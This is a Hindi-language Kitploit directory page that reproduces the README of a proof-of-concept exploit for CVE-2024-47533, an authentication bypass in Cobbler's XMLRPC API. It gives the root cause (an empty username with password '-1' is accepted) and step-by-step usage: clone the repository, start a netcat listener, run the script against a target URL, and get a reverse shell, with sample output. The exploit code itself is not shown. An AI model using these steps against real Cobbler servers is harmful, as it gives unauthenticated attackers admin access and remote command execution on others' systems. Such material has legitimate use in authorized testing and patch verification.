Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-47533-PoC — CVE-2024-47533 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो कॉबलर के XMLRPC API में प्रमाणीकरण बाईपास है, जो अप्रमाणित रिमोट कोड निष्पादन और रिवर्स शेल की ओर ले जाता है। | Kitploit
उपकरण/GitHubGitHub/00xcanelo/cve-2024-47533-poc
प्रमाणीकरण और प्राधिकरणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग
GitHub00xcanelo/cve-2024-47533-poc

CVE-2024-47533-PoC

CVE-2024-47533 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो कॉबलर के XMLRPC API में प्रमाणीकरण बाईपास है, जो अप्रमाणित रिमोट कोड निष्पादन और रिवर्स शेल की ओर ले जाता है।

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-47533 – Cobbler XMLRPC प्रमाणीकरण बायपास → रिवर्स शेल (अनप्रमाणित RCE)

📌 सारांश

यह रिपॉजिटरी CVE-2024-47533 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट है,
जो कोबलर के XMLRPC API में एक महत्वपूर्ण प्रमाणीकरण बायपास है, जो अनप्रमाणित रिमोट कोड निष्पादन (RCE) की ओर ले जाता है।

यह एक्सप्लॉइट प्रमाणीकरण को बायपास करने और background_import() के माध्यम से रिवर्स शेल कमांड इंजेक्ट करने के लिए XMLRPC API की login() विधि में दोष का लाभ उठाता है।


⚠️ अस्वीकरण

यह उपकरण केवल शैक्षिक, अनुसंधान और अधिकृत पैठ परीक्षण के लिए है।
इसे उन सिस्टम पर उपयोग न करें जिनके स्वामी नहीं हैं या जिनके परीक्षण के लिए स्पष्ट लिखित अनुमति नहीं है।
लेखक दुरुपयोग या हानि के लिए कोई देयता नहीं मानता।


🛠 तकनीकी विवरण

  • कमजोरी का प्रकार: प्रमाणीकरण बायपास → RCE
  • प्रभावित घटक: Cobbler XMLRPC API
  • आक्रमण वेक्टर: नेटवर्क
  • आवश्यक विशेषाधिकार: कोई नहीं
  • उपयोगकर्ता सहभागिता: कोई नहीं

मूल कारण:
utils.get_shared_secret() एन्कोडिंग के साथ बाइनरी मोड में फ़ाइल रीड को गलत तरीके से संभालने के कारण गलत तरीके से -1 लौटाता है, जिससे खाली उपयोगकर्ता नाम और -1 को पासवर्ड के रूप में प्रमाणीकरण की अनुमति मिलती है।

प्रभाव:
एक हमलावर यह कर सकता है:

  • एडमिन-स्तर API एक्सेस प्राप्त करना
  • कोबलर टेम्पलेट्स में मनमाना सिस्टम कमांड इंजेक्ट करना
  • लक्ष्य पर रिवर्स शेल उत्पन्न करना

🚀 उपयोग

1️⃣ रिपॉजिटरी क्लोन करें

root@kitploit:~
git clone https://github.com/00xCanelo/CVE-2024-47533-PoC.git
cd CVE-2024-47533-PoC

2️⃣ एक लिसनर सेट करें

अपने हमला करने वाली मशीन पर:

root@kitploit:~
nc -lvnp 4444

3️⃣ एक्सप्लॉइट चलाएँ

root@kitploit:~
python3 CVE-2024-47533.py -u http://<TARGET_IP>:<PORT>/RPC2 -l <LHOST> -p <LPORT>

उदाहरण:

root@kitploit:~
python3 CVE-2024-47533.py -u http://192.168.1.50:25151/RPC2 -l 192.168.1.100 -p 4444

📂 फ़ाइल संरचना

root@kitploit:~
.
├── CVE-2024-47533.py  # रिवर्स शेल एक्सप्लॉइट स्क्रिप्ट
└── README.md          # दस्तावेज़ीकरण

📸 नमूना आउटपुट

root@kitploit:~
[*] Target: http://192.168.1.50:25151/RPC2
[*] Listener: 192.168.1.100:4444
[*] Payload: bash
[*] Connecting to Cobbler...
[*] Authenticating...
[*] Executing exploit...
[+] Exploit sent! Got A Shell 🔥.

🧑‍💻 लेखक

00xCanelo
GitHub प्रोफ़ाइल


📚 संदर्भ

  • NVD: CVE-2024-47533
  • Cobbler प्रोजेक्ट GitHub
टूल डाउनलोड करें